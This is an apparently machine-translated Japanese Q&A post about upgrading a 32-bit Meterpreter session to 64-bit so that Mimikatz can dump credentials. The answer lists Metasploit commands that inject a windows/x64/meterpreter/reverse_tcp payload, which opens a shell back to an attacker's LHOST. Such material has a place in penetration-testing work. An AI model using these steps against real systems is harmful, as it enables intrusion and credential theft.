web-dev-qa-db-ja.com

64ビットMeterpreterステージャーをどのように送信しますか?

送信されるすべてのステージャーは32ビットのようです。私はMimikatzを実行する必要があるまで、これは問題ありません。64ビットシステムでは、64ビットmimikatzを実行する必要があります。 64ビットのMimikatzは32ビットのMeterpreterでは動作しないため、64ビットのMeterpreterが必要です。

3
bzupnick

64ビットMeterpreterペイロードを使用するだけです。

たとえば、windows/x64/meterpreter/reverse_tcpペイロード。
Metasploitに組み込まれているpayload_injectモジュールを使用して、32ビットシェルから64ビットシェルを取得できます。

これは、32ビットMeterpreterシェルを既に持っている後に次のコマンドを実行することで実行できます:use windows/local/payload_inject
set payload windows/x64/meterpreter/reverse_tcp


次に、他のパラメータ(SESSION、LHOST、LPORT)を自分のパラメータに設定します。次に、64ビットMeterpreterシェルを入手します。

5